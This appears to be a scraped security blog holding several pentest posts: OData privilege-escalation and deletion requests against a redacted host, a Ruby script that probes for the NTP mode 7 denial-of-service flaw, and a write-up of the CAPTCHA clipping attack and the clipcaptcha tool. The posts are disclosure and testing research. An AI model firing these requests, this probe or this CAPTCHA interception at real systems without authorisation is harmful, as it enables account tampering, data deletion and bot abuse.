<a href="http://www.mcafee.com/us/downloads/free-tools/oyedata.aspx" target="_blank">OyeData</a> is a tool I wrote to help with OData assessments and is pretty much required. If you're unfamiliar with the tool, check out the video:<br />
<br />
<center>
<iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/QmgmfHXWgvo" width="420"></iframe><br /><br />
</center>
<br />
<span style="font-size: large;">Assessment</span><br />
Now that you fully understand the application and have a good idea of what on the server side is available, you can being to think about available attack vectors. Given what was available for our application, we proceeded to the attack phase with the following:<br />
<br />
<br />
<ol style="text-align: left;">
<li>Check for Horizontal Privilege Escalation.</li>
<li>Identify what data/functionality was available through the additional Feeds discovered.</li>
<li>Attempt RESTful operations that were not utilized by the thick client and shown to exist via automated Oyedata analysis. Oyedata’s data generator also helped by generating random sample data, especially for cryptic data types like Edm.DateTime and Edm.DateTimeOffset.</li>
</ol>
<br />
<div>
<div>
<span style="font-size: large;">A Few Interesting Findings</span></div>
<div>
After exhausting our attack vectors (plus a few extra from our methodology) we found some interesting findings. Here are some of them. We modified/obfuscated the output a bit as we’re still awaiting remediation confirmation from the vendor. </div>
<div>
<br /></div>
<div>
<b>Passwords were Stored in Clear and exposed via Feeds</b></div>
<div>
The OData web service exposed username and passwords of all users via its Users feed. This finding highlights two important concerns:</div>
<div>
<br /></div>
<div>
<ol style="text-align: left;">
<li>The affected feed had mis-configured access control that allowed access to the Users table.</li>
<li>The database had user passwords in clear.</li>
</ol>
<div>
<br /></div>
</div>
</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4DDEn3ueWtz1df9882OsO1VrmgUEWeZ_82pXSGq0lI3lU4f4_noEI2L2o4wep8K-VegxPgrCLTCetLn2IEFd7jtNu2Q7fLKztsO13UXKJdmGklIoqGHSP8oHJATLK4Ni4od2VgCZNGcw/s1600/1.png" imageanchor="1"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4DDEn3ueWtz1df9882OsO1VrmgUEWeZ_82pXSGq0lI3lU4f4_noEI2L2o4wep8K-VegxPgrCLTCetLn2IEFd7jtNu2Q7fLKztsO13UXKJdmGklIoqGHSP8oHJATLK4Ni4od2VgCZNGcw/s400/1.png" width="400" /></a><br />
<br />
<h2>
Privilege Escalation</h2>
The thick client did not offer any functionality to add, update or remove new users. The user role we had did not offer it either. However, it was possible to add new logins with privileges of our user account by sending the following RESTful (POST request generated using Oyedata) to the OData service. It was also possible to update or delete other users with the test user account we had.<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> POST /XXXXXService.svc/RemoteLogins HTTP/1.1
Host: www.vulnerablehost.com:8011
Accept: application/atom+xml,application/atomsvc+xml,application/xml
Content-Type: application/atom+xml
Authorization: Basic UmVhbGx5PzpOb3RoaW5nSGVyZTop
<?xml version="1.0" encoding="utf-8"?>
<entry xmlns="http://www.w3.org/2005/Atom" xmlns:m="http://schemas.microsoft.com/ado/2007/08/dataservices/metadata" xmlns:d="http://schemas.microsoft.com/ado/2007/08/dataservices">
<content type="application/xml">
<m:properties>
<d:GroupId>4</d:GroupId>
<d:RemoteServerId>1</d:RemoteServerId>
<d:Login>newuser</d:Login>
<d:Password>newpassword </d:Password>
</m:properties>
</content>
</entry>
</code></pre>
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV9yRnbr3Frby7ijCIbKOjlikXFXrzV_bhN5IK-smWSUUvCWoHMQFjZZV1BPBEJtT5MeVZMZjSRrbrBtAv3fCFZJhFq09j6yLoIJxp9NrVq6hGJBbzqNRtmWbS1cacfWYIiUYMoJloN5k/s1600/2.png" imageanchor="1"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV9yRnbr3Frby7ijCIbKOjlikXFXrzV_bhN5IK-smWSUUvCWoHMQFjZZV1BPBEJtT5MeVZMZjSRrbrBtAv3fCFZJhFq09j6yLoIJxp9NrVq6hGJBbzqNRtmWbS1cacfWYIiUYMoJloN5k/s400/2.png" width="400" /></a><br />
<br />
The application also allowed us to download results for other user’s submission’s and was found to be vulnerable to several instances of both Horizontal and Vertical Privilege attacks.<br />
<br />
<h2>
Application Logic Bypass</h2>
The client application did not provide any functionality to overwrite or delete past computation submissions however we were able to by abusing the OData web service since it was insecurely configured and allowed updates via PUT method. The previous submissions could also be deleted by issuing the following request. Here the value ‘100’ indicates the submission ID.<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> DELETE /XXXXService.svc/Submissions(100) HTTP/1.1
Host: www.vulnerablehost.com:8011
Accept: application/atom+xml,application/atomsvc+xml,application/xml
Content-Type: application/atom+xml
Authorization: Basic UmVhbGx5PzpOb3RoaW5nSGVyZTop
</code></pre>
<br />
<br />
<h1>
Conclusion</h1>
OData is a new protocol that attempts to be the JDBC/ODBC for the internet and provide a new dimension to data access. Organizations that plan to implement OData should strive to learn more about this wonderful new protocol, the security risks involved and secure it as part of the deployment process.<br />
<div class="comments" id="comments">
<div class="comment-form">
<a href="http://www.blogger.com/comment-iframe.g?blogID=3421984462344108380&postID=3005190932554396698" id="comment-editor-src"></a>
<iframe allowtransparency="true" class="blogger-iframe-colorize blogger-comment-from-post" frameborder="0" height="410" id="comment-editor" name="comment-editor" src="" width="100%"></iframe>
<script src="//www.blogger.com/static/v1/jsbin/2029410298-comment_from_post_iframe.js" type="text/javascript"></script>
<script type="text/javascript">
BLOG_CMT_createIframe('http://www.blogger.com/rpc_relay.html', '15286360688505872292');
</script>
</div>
<br />
<div id="backlinks-container">
<div id="Blog1_backlinks-container">
</div>
</div>
</div>
</div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com1tag:blogger.com,1999:blog-4663432300421783651.post-86978057124721691022012-10-06T21:40:00.000-07:002012-10-06T21:41:47.281-07:00Verifying NTP Reserved Mode Denial of Service Vulnerability<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">I
recently needed to check a NTP Reserved Mode Denial of Service vulnerability <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3563">CVE-2009-3563</a>,
but without causing the DoS condition on the production server. Using Metasploit’s auxillary module </span><span style="font-family: Courier New, Courier, monospace; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">auxiliary/dos/ntp/ntpd_reserved_do</span><span style="font-family: Courier New, Courier, monospace; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">s </span><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">was not an option so I wrote my own Ruby script to assess the remote server. This
script verifies the returned UDP packet content to determine presence of vulnerability
and is shared below.</span><br />
<span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><br /></span></div>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style><br />
<pre class="CICodeFormatter"><code class="CICodeFormatter">#Author: Gursev Singh Kalra
require 'socket'
TIMEOUT = 5
if(ARGV.count != 1)
puts "[-] Target host not provided. Usage: ntp.rb <target_server>"
exit
end
target_server = ARGV[0]
target_port = 123
socket = nil
response = nil
begin
test_string = "\x97\x00\x00\x00\xAA\x00\x00\x00"
socket = UDPSocket.open
socket.send(test_string, 0, target_server, target_port)
if select([socket], nil, nil, TIMEOUT)
response = socket.recvfrom(10)
end
rescue (IOError ex)
puts ex.to_s
ensure
socket.close if(socket)
end
if(response && response[0].index("\x97\x00\x00\x00"))
puts "[+] Vulnerable to NTP Mode 7 Request Denial Of Service"
else
puts "[-] Not vulnerable to NTP Mode 7 Request Denial Of Service "
end
</code></pre>
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicraLVC_jq8xEnnGJ1GWEJ5CqDLEtmz3rxCAzaITdD9RwnOVHsXrYIdAywLk1EC7hupvHaWYuIek7w-nPpo2NgmjXUpkoLu3pJrn9qj2QQRwMX7ApfhEP1LVfJGZ7a50Whsb4ud3e99i4m/s1600/to-remote-server.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicraLVC_jq8xEnnGJ1GWEJ5CqDLEtmz3rxCAzaITdD9RwnOVHsXrYIdAywLk1EC7hupvHaWYuIek7w-nPpo2NgmjXUpkoLu3pJrn9qj2QQRwMX7ApfhEP1LVfJGZ7a50Whsb4ud3e99i4m/s400/to-remote-server.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1: Image shows request capture in wireshark</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR35u9vewKMm30Z4eCKxxBrhGlvknysA85J3eiOie1RdV7fyazXF38ohuLSdCqlTjMVuX1tjjAtwv-TE214LbLGoJD_EtKveH7LvHgfTZJLJzbus_v1hWn0kpvX6TBHbi8dcBVhF79rcov/s1600/from-remote-server.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR35u9vewKMm30Z4eCKxxBrhGlvknysA85J3eiOie1RdV7fyazXF38ohuLSdCqlTjMVuX1tjjAtwv-TE214LbLGoJD_EtKveH7LvHgfTZJLJzbus_v1hWn0kpvX6TBHbi8dcBVhF79rcov/s400/from-remote-server.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2: Image shows response capture in wireshark</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpbJelBL55PvYEHva31FjQXU3p2Yxfma72PUXYjJIYUBmieaIxQKWVCl-r7ZQd44tg83EDYeEteSIR99rkXTJ42ghEBKAw-o5OI5ddEqcZSUwmQYPi7B8Wa6pF0twt-JTSHGgQdnpb3iVW/s1600/ntp-run.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="107" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpbJelBL55PvYEHva31FjQXU3p2Yxfma72PUXYjJIYUBmieaIxQKWVCl-r7ZQd44tg83EDYeEteSIR99rkXTJ42ghEBKAw-o5OI5ddEqcZSUwmQYPi7B8Wa6pF0twt-JTSHGgQdnpb3iVW/s400/ntp-run.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3: Image shows script in action</td></tr>
</tbody></table>
</div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com0tag:blogger.com,1999:blog-4663432300421783651.post-73507022011364674572012-10-02T21:36:00.001-07:002012-10-06T21:44:26.164-07:00Bypassing CAPTCHAs by Impersonating CAPTCHA Providers<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;">CAPTCHA service providers validate millions of CAPTCHAs each day and protect thousands of websites against the bots. A secure CAPTCHA generation and validation ecosystem forms the basis of the mutual trust model between the CAPTCHA provider and the consumer. A variety of damage can occur if any component of this ecosystem is compromised.</span></span><br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><br /></span></span>
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;">During Analysis of the CAPTCHA integration libraries provided by several CAPTCHA providers (including <a href="http://www.google.com/recaptcha" target="_blank">reCAPTCHA</a>) revealed that almost all of the CAPTCHA verification API’s relied on plain text HTTP protocol to perform CAPTCHA validation. Because of this, the CAPTCHA provider’s identity was not validated, message authentication checks were not performed and the entire CAPTCHA validation was performed on an unencrypted channel. This vulnerability was also reported to reCAPTCHA team several months back. </span></span><br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><br /></span></span>
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;">If you decompile the .NET Plugin, you'll be able to pull out reCAPTCHA's verification URL, which demonstrates the absense of HTTPS:</span></span><br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9za8i2fhrTtIPoKchEXyDbqzckuCEawT2Je6WPpYqfiThsyPqn5xeigr_vFRwVAUgIuE8Z3469JoK1NcKDKMS2Ca65tyELnaTM-q87O219fpvGlsXRRDwfQo5vILlqRpBDFQTVpEqWA_t/s1600/recaptcha-dotnet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9za8i2fhrTtIPoKchEXyDbqzckuCEawT2Je6WPpYqfiThsyPqn5xeigr_vFRwVAUgIuE8Z3469JoK1NcKDKMS2Ca65tyELnaTM-q87O219fpvGlsXRRDwfQo5vILlqRpBDFQTVpEqWA_t/s400/recaptcha-dotnet.png" width="400" /></a></div>
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><br /></span></span>
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><br /></span></span>
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">In the current scenario, two types of attacks can be launched against vulnerable CAPTCHA implementations. These attacks are based on the assumption that an attacker is able to intercept the CAPTCHA validation traffic between target website and the CAPTCHA provider.</span><br />
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><br /></span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: x-large;"><br /></span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: x-large;">Private Key Compromise</span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;">Most of CAPTCHA providers issue private and public keys to identify a particular consumer and to enforce an upper limit on the number of CAPTCHAs used by them. Private keys are often sent over to the CAPTCHA provider during the CAPTCHA validation process. If the public and private keys are sent using plain text HTTP, an attacker could sniff the private keys and:</span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><br /></span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;">Use the CAPTCHA service for without registering for the service by using the captured keys.</span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;">Exhaust the target web site’s CAPTCHA quota for the service, which depending on the CAPTCHA provider may cause a wide variety of unexpected issues.</span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><br /></span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: x-large;"><br /></span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: x-large;">The CAPTCHA Clipping Attack</span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;">The following image describes what I call the "CAPTCHA Clipping Attack". Notice that steps 5 and 6 in blue would be the normal operation of events. We'll go into the attack in a little more detail below.</span></div>
<div style="line-height: 18px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKeE5FsBKJz4HJxx2-OfH8OXKM0_ih8xPdYLTUvQRDb0F6MagUTPsFL_eePnnFOU4HqoB001i651ybYLKdWYoxtRaufYY6J0YtZpRwPlP_Hl_DED2hKouJJ88Snq5RbPI5LgEPmZC5ce0K/s1600/captcha-clipping-attack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKeE5FsBKJz4HJxx2-OfH8OXKM0_ih8xPdYLTUvQRDb0F6MagUTPsFL_eePnnFOU4HqoB001i651ybYLKdWYoxtRaufYY6J0YtZpRwPlP_Hl_DED2hKouJJ88Snq5RbPI5LgEPmZC5ce0K/s400/captcha-clipping-attack.png" width="400" /></a></div>
<div style="line-height: 18px;">
<br /></div>
<br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;">Since the website’s application server acts as a client to CAPTCHA provider during steps 5 and 6 (in blue) and the application server often neglects to validate the CAPTCHA provider’s identity and the session integrity checks, an attacker may be able to impersonate the CAPTCHA provider and undermine the anti-automation protection (steps 5 and 6 in red). CAPTCHA validation responses are mostly Boolean (true or false, success or failure, pass or fail, 0 or 1). The response format and its contents are also publicly available as part of CAPTCHA provider’s API documentation. This allows an attacker to easily construct the finite set of possible responses, impersonate the CAPTCHA provider, and perform malicious CAPTCHA validation for the application servers. </span></span><br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><br /></span></span>
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;">To exploit this vulnerability an attacker performs the following:</span></span><br />
<br />
<ol style="text-align: left;">
<li><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">The attacker acts as a legitimate application user and submits a large number of requests to the web application.</span></li>
<li><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">At the same time, he/she intercepts CAPTCHA validation requests, masquerades as the CAPTCHA provider and approves all submitted requests.</span></li>
</ol>
<br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;">Masquerading as the CAPTCHA provider and not forwarding the CAPTCHA validation requests to the actual CAPTCHA provider is the CAPTCHA Clipping Attack.</span></span><br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><br /></span></span>
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: x-large;"><span style="line-height: 18px;">clipcaptcha</span></span><br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;">clipcaptcha is a proof of concept exploitation tool that specifically targets the vulnerabilities discussed above and allows complete bypass of CAPTCHA provider protection. clipcaptcha is built on the <a href="http://www.thoughtcrime.org/software/sslstrip/" target="_blank">sslstrip </a>codebase and has the following features:</span></span><br />
<br />
<ol style="text-align: left;">
<li><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">Performs signature based CAPTCHA provider detection and clipping.</span></li>
<li><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">Can be easily extended to masquerade as any CAPTCHA provider by adding corresponding signatures to the configuration XML file.</span></li>
<li><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">Has built in signatures of several CAPTCHA providers including reCAPTCHA, OpenCAPTCHA, Captchator etc…</span></li>
<li><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">Logs POST requests that match any supported CAPTCHA provider to capture private and public keys. Unmatched requests are forwarded as is.</span></li>
<li><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">clipcaptcha supports five operational modes. These are “monitor”, “stealth”, “avalanche”, “denial of service” and “random”.</span></li>
</ol>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguNHVoaYfdRW_xHdAt-ZrlhQdB9AkxKjmZ15tIZ6wD_CAuMZ8LpqsdY2tnZ8s_8eji0b6S1UM3vhIuB8a0G9djECcjvFE3GGus5itKIQGxVcIIbH3EDEWe_Q2U8e8AySIn13wnyGv_NeDy/s1600/clipcaptcha-help.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguNHVoaYfdRW_xHdAt-ZrlhQdB9AkxKjmZ15tIZ6wD_CAuMZ8LpqsdY2tnZ8s_8eji0b6S1UM3vhIuB8a0G9djECcjvFE3GGus5itKIQGxVcIIbH3EDEWe_Q2U8e8AySIn13wnyGv_NeDy/s320/clipcaptcha-help.png" width="320" /></a></div>
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><br /></span></span>
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"></span><br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><span style="font-size: x-large;">Download</span></span></span><br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;">clipcaptcha can be downloaded <a href="https://github.com/OpenSecurityResearch/clipcaptcha" target="_blank">here</a></span><span style="line-height: 18px;"> </span></span><br />
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><br /></span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;">This blog post is a copy of my original post <a href="http://blog.opensecurityresearch.com/2012/08/bypassing-captchas-by-impersonating.html" target="_blank">here</a></span></div>
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Oct 7, 2012 Update: </b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">The complete whitepaper is available for download from <a href="http://www.mcafee.com/us/resources/white-papers/foundstone/wp-bypassing-captchas.pdf" target="_blank">here</a>.</span><br />
<br />
<br />
<br /></div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com2tag:blogger.com,1999:blog-4663432300421783651.post-1171412377183821302012-06-12T16:21:00.003-07:002012-06-12T16:24:44.561-07:00Oyedata for OData Security Assessments<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal">
The Open Data Protocol (OData) is an open web protocol for
querying and updating data. OData enables the creation of HTTP based
RESTful data services that can be used
to publish and edit resources with simple HTTP messages. OData is intended to be used to expose and
access information from a variety of sources including relational databases,
file systems, content management systems, and traditional web sites. It allows
a consumer to query a data source over HTTP protocol and get results back in
formats like Atom, JSON or plain XML. OData can be termed as JDBC/ODBC for the
internet.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
The protocol is relatively new and is being adopted by many
major software manufacturers such as Microsoft, IBM, and SAP but hasn’t been
publically explored in terms of security. As more applications, websites, and
frameworks support OData, a larger attack surface becomes available to
attackers.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Oyedata is a new tool to perform black-box OData security
testing and help secure OData deployments. I wrote Oyedata from a penetration testing perspective and its the major features are
summarized below:</div>
<div class="WhitePaperBodycopy" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
1.<span style="font-size: 7pt;"> </span>Intuitive
GUI based tool written in C#.</div>
<div class="WhitePaperBodycopy" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
2.<span style="font-size: 7pt;"> </span>Ability
to create attack templates from local and remote Service Documents and Service
Metadata Documents.</div>
<div class="WhitePaperBodycopy" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
3.<span style="font-size: 7pt;"> </span>Support
for XML and JSON data formats.</div>
<div class="WhitePaperBodycopy" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
4.<span style="font-size: 7pt;"> </span>Ability
to export attack templates in JSON and XML formats that can be fed to custom
Fuzzing code.</div>
<div class="WhitePaperBodycopy" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
5.<span style="font-size: 7pt;"> </span>Ability
to engage the OData services for manual testing.</div>
<div class="WhitePaperBodycopy" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
6.<span style="font-size: 7pt;"> </span>Data
generator for EDMSimpleType test data generation.</div>
<div class="WhitePaperBodycopy" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
7.<span style="font-size: 7pt;"> </span>Ability
to generate “Read URIs” for Entities, Entity Properties and Entity Property
Values.</div>
<div class="WhitePaperBodycopy" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
8.<span style="font-size: 7pt;"> </span>Ability to
generate attack templates for Creation of new Entries, updating existing
Entries, Service Operation invocation, Entry deletion etc…</div>
<div class="WhitePaperBodycopy" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
9.<span style="font-size: 7pt;"> </span>Ability
to identify Keys, Nullable and Non-Nullable Properties and indicate the same in
the attack templates.</div>
<div class="WhitePaperBodycopy" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
10.<span style="font-size: 7pt;"> </span>Web
proxy, HTTP and HTTPS support and Error logging.</div>
<div class="WhitePaperBodycopy" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<br /></div>
<div class="WhitePaperBodycopy" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2FRE1xY_h_G7gIhhTNjPWxK66zNYqjrwa47lovzfER6eXalgMlnhrT3pK3UvwuSFHKFPlZoo_QJp9LGUTst7yqYYbZje6CEhSAqHrcudf_5qf4Reb-g-rDCjrwjEnUw_C2SaZp4qcyJ8Q/s1600/InitialRun.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2FRE1xY_h_G7gIhhTNjPWxK66zNYqjrwa47lovzfER6eXalgMlnhrT3pK3UvwuSFHKFPlZoo_QJp9LGUTst7yqYYbZje6CEhSAqHrcudf_5qf4Reb-g-rDCjrwjEnUw_C2SaZp4qcyJ8Q/s400/InitialRun.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: left;">Image shows Oyedata retrieving an OData Service Metadata document</span> </td></tr>
</tbody></table>
<div class="WhitePaperBodycopy">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
